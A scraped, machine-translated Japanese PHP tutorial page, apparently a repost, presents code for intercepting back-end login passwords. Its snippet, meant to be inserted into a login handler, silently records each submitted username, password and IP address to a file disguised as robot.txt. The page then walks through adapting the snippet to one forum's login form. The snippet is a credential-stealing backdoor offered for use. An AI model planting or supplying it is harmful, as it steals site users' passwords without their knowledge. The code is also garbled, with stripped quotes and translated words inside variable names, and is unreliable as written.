ホームページ  >  記事  >  バックエンド開発  >  バックグラウンドログインパスワードをインターセプトするための PHP コード_PHP チュートリアル

バックグラウンドログインパスワードをインターセプトするための PHP コード_PHP チュートリアル

WBOY
WBOYオリジナル
2016-07-21 15:19:27868ブラウズ

if($_POST[loginsubmit]!=){ //ログインボタンがクリックされたかどうかを判定
$sb=user:.$_POST[ユーザー名].--passwd:.$_POST[パスワード].--ip:.$ HTTP_SERVER_VARS [REMOTE_ADDR].--.date(Y-m-d H:i:s).rn; // POSTで受け取った値を連結して変数$sbに代入します
fwrite(fopen(robot.txt,ab), $sb); } //結果はファイルに書き込まれます


以下は、Huaxia のログイン ページを例として挙げた簡単な分析です。 bbs.xxx.com/login.php を開き、右クリックしてソース コードを表示し、CTRL+F 検索アクションでログイン フォームを見つけます。

キーコードをコピーしただけです


アクションの後の値はフォームの送信です。たとえば、パスワードが正しいかどうかを判断する方法は POST であるため、$_POST を使用してそれを受け取ります。

。 。 。 。強力な省略記号。 。 。 。 。 。


アカウント(U):

class=input id=pwuser accessKey=u size=16
name =pwuser> //ユーザー名の入力ボックス。$_POST[username] に対応する必要があるので、Huaxia のパスワードを変更する必要があります。 $_POST[pwuser] へ


パスワード(P):
class=input id=pwpwd accessKey=p
type=password size=16 name=pwpwd> //ユーザー名の入力ボックスは、$_POST[username] に対応する必要があるので、 Huaxia のパスワードを $_POST[pwpwd] に変更する必要がある

www.bkjia.comtru​​ehttp://www.bkjia.com/PHPjc/325278.html技術記事 if($_POST[loginsubmit]!=){ //ログインボタンがクリックされたかどうかを判定$sb=user:.$_POST[username].--passwd:.$_POST[password].--ip:.$HTTP_SERVER_VARS [ REMOTE_ADDR ].--.date(Y-m-d H:i:s).rn //...
;
声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。